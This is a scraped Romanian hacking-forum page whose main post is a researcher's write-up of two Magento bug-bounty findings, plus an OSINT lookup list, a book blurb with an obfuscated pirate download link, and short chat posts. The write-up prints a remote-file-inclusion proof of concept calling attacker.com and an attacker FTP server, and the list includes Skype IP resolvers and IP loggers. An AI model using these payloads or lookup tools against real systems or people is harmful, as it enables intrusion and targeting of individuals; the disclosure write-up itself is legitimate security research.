Leaderboard

Tu te ocupi de logistica? Serios ? ---> http://www.colorgemsjewelry.com/products/

Pe chat e o calitate a discutiilor mai ridicata fata de forum. Nu acceptam pe oricine printre noi.

Hacking Magento eCommerce For Fun And 17.000 USD Magento, which was acquired by Ebay Inc back in 2011, is one of the most popular e-commerce platforms written in PHP. There is an interesting bug bounty program in place that offers bounties of up to 10,000$ for Information Disclosure and Remote Code Execution vulnerabilities. In November 2014, I decided to give it a try, so I started looking for security bugs in Magento CE, and almost immediately I discovered a PHP Object Injection vulnerability which (un)fortunately requires administrator privileges in order to be exploited. I thought this reason was good enough to choose not to report my finding under their bug bounty program, since Magento administrators should already be able to upload and execute arbitrary code through the administration panel. However, after a couple of weeks a friend of mine encouraged me to submit the finding, because you never know. So I did it, and when I finished writing my report including a PoC, and I was about to send it, I noticed that the bug had already been (silently!) patched only a few days earlier! The researcher who reported the vulnerability has been awarded with 2,500$ for the very same finding… A couple of months later, in February 2015, there was a lot of rumors about what I consider a very nice piece of research which chains several vulnerabilities in Magento that ultimately allow an unauthenticated attacker to execute arbitrary PHP code on the web server. Getting inspired by these vulnerabilities, I decided to come back to Magento source code looking for new security bugs, and I discovered and reported two vulnerabilities which made me win two bounties I’d never thought I’d receive: 8,000$ and9,000$. Both of the vulnerabilities were discovered in February 2015, however I decided to report only a “potential Remote Code Execution” at a first stage, because I thought the other one – a trivial information leakage bug – had a security impact too low in order to be eligible for the bug bounty program, in other words I thought it wasn’t a “real” security issue. I was wrong (again!)… • Autoloaded File Inclusion in SOAP API (CVE-2015-6497) There is a class of vulnerabilities that might affect certain PHP applications which uses an “exploitable” autoloading mechanism. The “Autoloading Classes” feature has been introduced in PHP 5.0 with the magic function __autoload() which is automatically called when your code references a class or interface that hasn’t been loaded yet. So, instead of including every needed class by hand, it is possible to register a function that gets called as soon as the code tries to instantiate an unknown class. This function gets passed the unknown class name and is responsible for including the right file that contains the class definition. While this feature is extremely useful and powerful, it might introduce potential Local/Remote File Inclusion vulnerabilities when user-controlled input is used as a class name. Indeed, if an attacker can control the class name variable passed to an autoloading function, she could try to play around with it in order to include an arbitrary file and execute PHP code remotely. There are multiple ways to trigger the autoloader, the most obvious is class instantiation using the new operator. In addition to that, there are some PHP functions which can be considered a sensitive sink for this class of vulnerabilities. Here is an incomplete list: class_exists() interface_exists() method_exists() property_exists() is_subclass_of() … So, when user-controlled input (tainted data) enters one of these sensitive sinks there’s a chance for the application to be vulnerable to an “Autoloaded File Inclusion” attack. Let’s see a simple example of vulnerable code: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 /* Some code... */ function __autoload($class_name) { include $class_name . '.php'; } if(isset($_GET['class']) && class_exists($_GET['class'])) { $myObject = new $_GET['class']; } else { die('No class found'); } /* Some code... */ In this example an attacker controls a class name via the GET parameter “class”, which is first used with the class_exists()function (triggering the autoloader in case it is an unknown class) and then to instantiate a new object. This means that the attacker can control the $class_name variable passed to the autoloader, therefore it could be possible to include arbitrary files from both local or remote resources by invoking URLs like these: http://example.com/vuln.php?class=http://attacker.com/shell http://example.com/vuln.php?class=../../../tmp/cache/attacker_controlled/file In the first case the autoloader will try to include and execute the PHP code located at http://attacker.com/shell.php, resulting in a Remote File Inclusion (RFI); while in the second case the autoloader will try to include and execute the PHP code located into the file /tmp/cache/attacker_controlled/file.php, resulting in a Local File Inclusion (LFI). Furthermore, in cases like this where the attacker controls the classname’s prefix, in addition to http:// other PHP wrappers might be abused in order to execute arbitrary PHP code. According to the official PHP documentation “a valid class name starts with a letter or underscore, followed by any number of letters, numbers, or underscores”. That means an attacker cannot include arbitrary files via class names because it should not be possible to e.g. use path traversal sequences (../../) through them. But here comes the problem: there was a bug in the PHP core which allowed to invoke class autoloaders with invalid class names. This bug was solved in January 2014 with the release of PHP versions 5.4.24 and 5.5.8, and that’s probably one of the reasons why Magento’s security engineers have undervalued this issue. Magento Vulnerability The vulnerability in Magento is caused by the code that handles the “catalogProductCreate” SOAP API call. The vulnerable code is located into the /app/code/core/Mage/Catalog/Model/Product/Api/V2.php script: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 public function create($type, $set, $sku, $productData, $store = null) { if (!$type || !$set || !$sku) { $this->_fault('data_invalid'); } $this->_checkProductTypeExists($type); $this->_checkProductAttributeSet($set); /** @var $product Mage_Catalog_Model_Product */ $product = Mage::getModel('catalog/product'); $product->setStoreId($this->_getStoreId($store)) ->setAttributeSetId($set) ->setTypeId($type) ->setSku($sku); if (!property_exists($productData, 'stock_data')) { //Set default stock_data if not exist in product data $_stockData = array('use_config_manage_stock' => 0); $product->setStockData($_stockData); } This method expects the $productData parameter to be an array (in form of a stdClass object) and uses the property_exists()function with it. However, an attacker can manipulate a SOAP request arbitrarily and send the $productData parameter in form of a string. In this case, if the string passed to the property_exists() function is an unknown class, any registered autoloader function will be triggered. When the property_exists() function is called there’s only one autoloader function registered, that is theVarien_Autoload::autoload() method: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 public function autoload($class) { if ($this->_collectClasses) { $this->_arrLoadedClasses[self::$_scope][] = $class; } if ($this->_isIncludePathDefined) { $classFile = COMPILER_INCLUDE_PATH . DIRECTORY_SEPARATOR . $class; } else { $classFile = str_replace(' ', DIRECTORY_SEPARATOR, ucwords(str_replace('_', ' ', $class))); } $classFile.= '.php'; //echo $classFile;die(); return include $classFile; } In such a scenario, the $class parameter automatically passed to this method is exactly the same string value sent through the$productData parameter from the SOAP request, which after some replacementes and a “.php” string appended to it, is being used in a call to the include() function. This may result in an arbitrary file inclusion (both from local or remote resources) and could be exploited to include and execute arbitrary PHP code. There are some conditions which should be met to exploit this vulnerability: an API user account with privileges to create a catalog product is required; in order to include arbitrary files from remote locations, Magento should run on PHP before 5.4.24 or 5.5.8, because such versions have fixed the issue related to invalid class names in the autoloading process; in order to include arbitrary files from remote locations the “allow_url_include” directive must be set to On; in case the “allow_url_include” directive is set to Off it might still be possible to include files from remote locations using thessh2.sftp:// wrapper (which requires the SSH2 extension to be installed) or execute arbitrary OS commands leveraging theexpect:// wrapper (which requires the Expect extension to be installed). NOTE: if Magento is running on PHP version after 5.4.23 or 5.5.7 the vulnerability could still be exploited by including a local file with a .php extension (something like /tmp/test.php). If Magento is running on PHP before 5.3.4 the vulnerability could be exploited to include arbitrary local files with any extension (e.g. a session file containing malicious PHP code injected by the attacker) because NULL bytes are allowed within the path (see CVE-2006-7243). Proof of Concept A remote attacker with valid API credentials could send a SOAP request like the following in order to exploit the vulnerability: POST /magento/index.php/api/v2_soap HTTP/1.0 Host: localhost Content-Length: 804 Connection: close <?xml version=”1.0″ encoding=”UTF-8″?> <SOAP-ENV:Envelope xmlns:SOAP-ENV=”http://schemas.xmlsoap.org/soap/envelope/” xmlns:ns1=”urn:Magento” xmlns:xsd=”http://www.w3.org/2001/XMLSchema” xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance” xmlns:SOAP-ENC=”http://schemas.xmlsoap.org/soap/encoding/” SOAP-ENV:encodingStyle=”http://schemas.xmlsoap.org/soap/encoding/”> <SOAP-ENV:Body> <ns1:catalogProductCreate> <sessionId xsi:type=”xsd:string”>VALID_SESSION</sessionId> <type xsi:type=”xsd:string”>simple</type> <set xsi:type=”xsd:string”>4</set> <sku xsi:type=”xsd:string”>test</sku> <productData xsi:type=”xsd:base64Binary”>ZnRwOi8vYXR0YWNrZXI6cGFzc3dvcmRAYXR0YWNrZXJfc2VydmVyLmNvbS9ob21lL2F0dGFja2VyL2V2aWw=</productData> <storeView xsi:nil=”true”/> </ns1:catalogProductCreate> </SOAP-ENV:Body> </SOAP-ENV:Envelope> The “productData” parameter has been encoded in base64 within the SOAP request, and the decoded string is the following: ftp://attacker:password@attacker_server.com/home/attacker/evil This means that leveraging the ftp:// wrapper, an attacker might be able to force Magento to load and execute malicious code from a FTP server under its control. In this example, the attacker only has to put the malicious code under /home/attacker/evil.php. However, as we said before, other PHP wrappers might be abused, potentially leading to direct arbitrary PHP code execution. Responsible Disclosure Timeline As I was saying, I reported this vulnerability in late February 2015, and I received the first reply from the Magento Security Team on June 22, 2015, stating that my submission was not eligible for the bug bounty program, because it was found to be invalid and not actionable. The reason for the rejection was that there are too many requirements to exploit the vulnerability. First of all, it requires Magento to be running on outdated PHP versions, because this kind of vulnerability has been fixed in the PHP core engine at the beginning of 2014. However, until today there are still many websites out there using such outdated PHP versions. That should be one of the reasons why the Magento Security Team replied on June 24, stating the following: We were able to confirm your issue. Even though it requires knowing API credentials, it should not be possible to execute such actions. The PHP versions that are additionally vulnerable, while old are still used in popular distributions like RHEL 7.1. We will schedule fixing this issue for our next product release given lower priority. We will inform you regarding possible awards associated with this report. On August 4, 2015, a bundle of patches (SUPEE-6482), which resolved several security-related issues, including the one I reported in February, was released by the Magento team. On the same day Magento released new versions (Community Edition 1.9.2.1 and Enterprise Edition 1.14.2.1) that include SUPEE-6482 along with other security patches. On August 13 I sent them an email asking whether there was any chance to get a bounty for reporting such a vulnerability. I had to ping them twice more, before getting their reply on August 25: Hello Egidio, Congratulations! Your vulnerability report and proof of concept have been accepted and you will be receiving a bounty of USD $8,000. I published KIS-2015-04 on September 11, 2015 and I received my bug bounty on September 21, 2015. • Information Disclosure in RSS Feed (CVE-2016-2212) After a while, in late October 2015, I remembered about that information leakage bug I discovered back in February, and I wondered “Why don’t try to report this as well? Maybe I’m missing something out and I wrongly believe this isn’t a real security issue”. Actually I was missing something crucial, the fact that leveraging this vulnerability a remote unauthenticated attacker might be able to download order comments and other order-related information, potentially including Personally Identifiable Information or credit card data… What a bad “AppSec Guy” I am!! I reported this vulnerability on October 29, 2015, including a Proof of Concept code, and a proposed patch for the vulnerability, which is exactly the same they used to fix the issue. I received a reply from the Magento Security Team on the very same day: Hello Egidio, Thank you for your submission. We have logged ticket APPSEC-1171 to track this issue. We will reach out to you once our security engineers have validated this issue. Per the Magento Responsible Disclosure Guidelines, we ask that you do not disclose your finding to the public or to the media while we validate your submission with our security engineers. After some months of silence, it was a wonderful Sunday afternoon when I noticed that some days earlier, specifically on January 20, 2016, the Magento team released SUPEE-7405 and new Magento versions which include fixes for several security-related issues, including “Information Disclosure in RSS feed – APPSEC-1171″. Consequently, I sent them another email asking whether there was any chance to get a bounty for reporting such a vulnerability (again!). I got their reply on February 1, 2016: Hello Egidio, Congratulations! Your vulnerability report and proof of concept have been accepted and you will be receiving a bounty of USD $9,000. I received my bug bounty on February 12, 2016 and I published KIS-2016-02 on February 23, 2016. Actually there is a weird coincidence, because that very same day, only a few hours before publishing the advisory on my website, they pushed an update:SUPEE-7405 v1.1 patch bundle. It could be just a coincidence, however I found this very curious… don’t you? Conclusion Seeing my personal experience with the Magento bug bounty program (and even experiences from other security researchers), it looks like they truly believe in a “security through obscurity” methodology. I’m quite disappointed by the fact they tried to downplay the severity of my vulnerabilities, silently patching them after several months, without letting me know their progresses. However, what really disappoints me is that my vulnerabilities seem to be quite critical, specially considering they’re the only two classes of security bugs they’re willing to pay up to 10,000$ under their bug bounty program. I had to ping them several times in order to get my bounties, so I believe they tried to “obscure” and underevaluate my findings not only because of their “security through obscurity” methodology, but probably because they were also hoping I’d never noticed their advisories with my name and the vulnerabilities I reported, and never claimed my bounties for such findings? This entry was posted on March 3, 2016 Sursa: http://karmainsecurity.com/hacking-magento-ecommerce-for-fun-and-17000-usd

Buy from: here Authors: Dr. Johann Uhrmann, Dr. Michael Spreitzenbarth Free download: aHR0cDovL21hYi50by9zZmtPVXlVTWk= Year: 2015 Pages: 178 About This Book - Learn to perform forensic analysis and investigations with the help of Python, and gain an advanced understanding of the various Python libraries and frameworks - Analyze Python scripts to extract metadata and investigate forensic artifacts - The writers, Dr. Michael Spreitzenbarth and Dr. Johann Uhrmann, have used their experience to craft this hands-on guide to using Python for forensic analysis and investigations Who This Book Is For If you are a network security professional or forensics analyst who wants to gain a deeper understanding of performing forensic analysis with Python, then this book is for you. Some Python experience would be helpful. What You Will Learn - Explore the forensic analysis of different platforms such as Windows, Android, and vSphere - Semi-automatically reconstruct major parts of the system activity and time-line - Leverage Python ctypes for protocol decoding - Examine artifacts from mobile, Skype, and browsers - Discover how to utilize Python to improve the focus of your analysis - Investigate in volatile memory with the help of volatility on the Android and Linux platforms In Detail Digital forensic analysis is the process of examining and extracting data digitally and examining it. Python has the combination of power, expressiveness, and ease of use that makes it an essential complementary tool to the traditional, off-the-shelf digital forensic tools. This book will teach you how to perform forensic analysis and investigations by exploring the capabilities of various Python libraries. The book starts by explaining the building blocks of the Python programming language, especially ctypes in-depth, along with how to automate typical tasks in file system analysis, common correlation tasks to discover anomalies, as well as templates for investigations. Next, we'll show you cryptographic algorithms that can be used during forensic investigations to check for known files or to compare suspicious files with online services such as VirusTotal or Mobile-Sandbox. Moving on, you'll learn how to sniff on the network, generate and analyze network flows, and perform log correlation with the help of Python scripts and tools. You'll get to know about the concepts of virtualization and how virtualization influences IT forensics, and you'll discover how to perform forensic analysis of a jailbroken/rooted mobile device that is based on iOS or Android. Finally, the book teaches you how to analyze volatile memory and search for known malware samples based on YARA rules.

Moderatorii nu pot da unban. Doar adminii pot scoate banul de pe chat.

update cu kies si dupa incearca kingofroot apoi http://forum.xda-developers.com/galaxy-s2/development-derivatives/rom-cyanogenmod-13-t3223808 + Greenify Donate v2.9 beta 2 am vazut ca se comporta ca un S5

Kingo root sau Odin.Incearca sa-l rootezi cu primul.

Pentru cei ce lucreaza in domeniu sau pentru curiosi :) 1: Username (Alias) http://namechk.com/ http://knowem.com/ http://www.namecheckr.com/ http://checkusernames.com/ http://usersherlock.com/ https://www.usersearch.org/ 2: Archives https://archive.org/index.php https://www.archive-it.org/ http://aad.archives.gov/aad/series-list.jsp?cat=GS29 3: Social Networks http://www.yasni.com/ http://socialmention.com/ http://www.whostalkin.com/ http://www.linkedin.com/ http://www.formspring.me/ http://foursquare.com/ https://about.me/ https://profiles.google.com/ http://blogger.com https://twitter.com/ http://www.facebook.com/ https://deviantart.com http://xanga.com/ http://tumblr.com/ http://myspace.com/ http://www.photobucket.com/ http://www.quora.com/ http://www.stumbleupon.com/ http://www.reddit.com http://www.digg.com http://www.plixi.com http://pulse.yahoo.com/ http://www.flickr.com/ 4: Phone Numbers http://www.freecellphonedirectorylookup.com http://www.numberway.com/ http://www.fonefinder.net http://www.whitepages.com/reverse-lookup http://www.anywho.com/reverse-lookup http://www.yellowpages.com/reversephonelookup http://www.spydialer.com/ http://www.intelius.com/reverse-phone-lookup.html 5: IP Addresses http://www.infosniper.net/ http://ip-lookup.net/ https://www.whatismyip.com/ip-whois-lookup/ http://whatstheirip.com http://getthierip.com 6: Skype Resolvers http://skypegrab.net/resolver.php http://www.skresolver.com/index.php http://resolvethem.com/ https://www.hanzresolver.com/skype2 https://skype-resolver.org/ http://mostwantedhf.info/ http://orcahub.com/skyperesolver.php https://booter.xyz/skype-resolver/ http://cstress.net/skype-resolver/ http://iskyperesolve.com/ https://ddosclub.com/skype-resolver/index.php 7: Database Search http://skidbase.io/ 8: WHOIS/Website https://www.whois.net/ http://whois.icann.org/en https://who.is/ http://www.whois.com/whois http://www.whois.com/ http://www.statsinfinity.com/ 9: Images http://www.tineye.com/ http://saucenao.com/ http://www.photobucket.com/ https://images.google.com/?gws_rd=ssl 10: IP2Skype http://skypegrab.net/ip2skype.php https://resolvethem.com/ip2skype.php http://www.skresolver.com/ip-to-skype.php http://mostwantedhf.info/ip2skype.php https://www.hanzresolver.com/ip2skype http://skype2ip.ninja/ip2skype.php https://pkresolver.nl/ip2skype.php http://www.chromeresolver.info/IP2Skype.php 11: Email2Skype http://mostwantedhf.info/email.php http://www.skresolver.com/email-to-skype.php https://www.hanzresolver.com/emaillookup https://resolvethem.com/email.php http://freetool.tk/email2skype.php http://skypegrab.net/email2skype.php 12: Skype2Lan http://www.skresolver.com/skype-to-lan.php 13: Skype2Email http://skypegrab.net/skype2email.php https://pkresolver.nl/skype2email.php 14: MAC Address Lookup http://www.coffer.com/mac_find/ http://www.whatsmyip.org/mac-address-lookup/ http://www.macvendorlookup.com/ http://macaddresslookup.org/ http://aruljohn.com/mac.pl 15: Lat/Long http://www.latlong.net/ http://itouchmap.com/latlong.html http://stevemorse.org/jcal/latlon.php 16: EXIF Data http://regex.info/exif.cgi http://exif-viewer.com/ http://metapicz.com/#landing http://www.verexif.com/en/ http://www.findexif.com/ http://www.prodraw.net/online-tool/exif-viewer.php http://exifdata.com/ 17: IP Logger http://grabify.link/ http://blasze.com/ 18: Other http://wink.com/ http://www.abika.com/ http://www.freeality.com/ http://radaris.com/ http://twoogel.com/ http://www.spokeo.com/ http://www.pipl.com/ http://wink.com/ http://www.peekyou.com/ http://yoname.com/ https://www.linkedin.com/ http://search.yahoo.com/ https://google.com/ https://bing.com/ https://reddit.com/ http://www.yellowpagesgoesgreen.org/ http://aad.archives.gov/aad/series-list.jsp?cat=GS29 http://www.numberway.com/uk/ https://www.vinelink.com/vinelink/initMap.do http://www.jailbase.com/en/sources/fl-lcso/ http://publicrecords.onlinesearches.com/ https://www.Intelius.com/ http://www.zoominfo.com/s/#search http://skipease.com/ https://www.advancedbackgroundchecks.com http://www.PublicRecordsNow.com

<?php $ip = $_SERVER['REMOTE_ADDR']; $query = @unserialize(file_get_contents('http://ip-api.com/php/'.$ip)); if($query['regionName'] == 'England') { echo ' <b>you are from England</b> '; } else { echo '<b>you are from somewhere else</b>'; } ?> Se poate dezvolta foarte usor..

Sunt utilizator de Windows. Într-o noapte îmi năzărește ideea de a băga un stand-up comedy înainte să mă culc. Ajung la laptop și îmi atrag atenția ledurile deschise. Ledul de Power, și ledul de WiFi. Mă scarpin în cap, îmi zic că poate am uitat să îl închid complet înainte să mă culc și îmi văd de treabă. O săptămână mai în colo, vin de la muncă găsesc laptopul în aceeași stare. Eram 100% sigur că l-am închis de dimineață. Ledul de power și cel de WiFi. Mă gândesc ce căcat. Dezactivez fast startup, hybrid sleep, orice altă măgărie care ar încerca mie să îmi deschidă device-ul cât timp nu sunt lângă el. Partea amuzantă e că a 3-a oară când mi s-a întâmplat aveam un linux server rulând înainte de shutdown. Am pus urechea pe la venturi, procesorul mergea. Becul de WiFi și de power deschis. Scot cablul, rămâne doar cel de WiFi. Mă conectez cu telefonul la router, să văd ce și cum. Ultimul lease de DHCP fusese dat cu 50 de minute în urmă (laptopul era lăsat singur de 8 ore!). Trafic 12kB down, 5MB up!! Îl deschis și intru pe Windows. Deschid "Event Viewer" - tabul system - ca să văd ce și cum. Observ că în urmă cu 2 ore laptopul meu fusese deschis. Nu era trecut motivul (power button/lid). Nu era trecut nimic. Încerc să fac disable la chestii random de prin device manager. Rămân doar cu mouse-ul și WiFi-ul, problema se tot reproduce. Apoi observ că câteodată înainte să opresc laptopul se pornește "Intel Management Engine Interface". Caut pe net. Hai să vă luminez puțin și cu vPRO Deci cât PC-ul meu era oprit un 3rd party (poate Intel, poate fosta persoana care avea laptopul sau mai știu eu cine) ar fi putut face ceva pe laptopul meu. Am observat că de pe Windows dacă dezactivez Intel Management Engine Interface din Device Manager -> System devices nu se mai reproduce. Pe linux nu am reușit nimic, că am decis să vând laptopul. Vă rog să citiți articolul de https://libreboot.org/faq/#intelme și spuneți dacă vă mai luați laptop cu vPRO vreodată. Vreți ca un RTOS pe nume ThreadX pe care nu îl controlați să pornească când nu sunteți de față? Treaba voastră. În concluzie am vândut acel laptop. Nu accept ca un OS pe care nu îl controlez să ruleze cât nu sunt de față. De acum în colo laptopuri fără vPro. // end of rant

Ransomware Tracker https://ransomwaretracker.abuse.ch/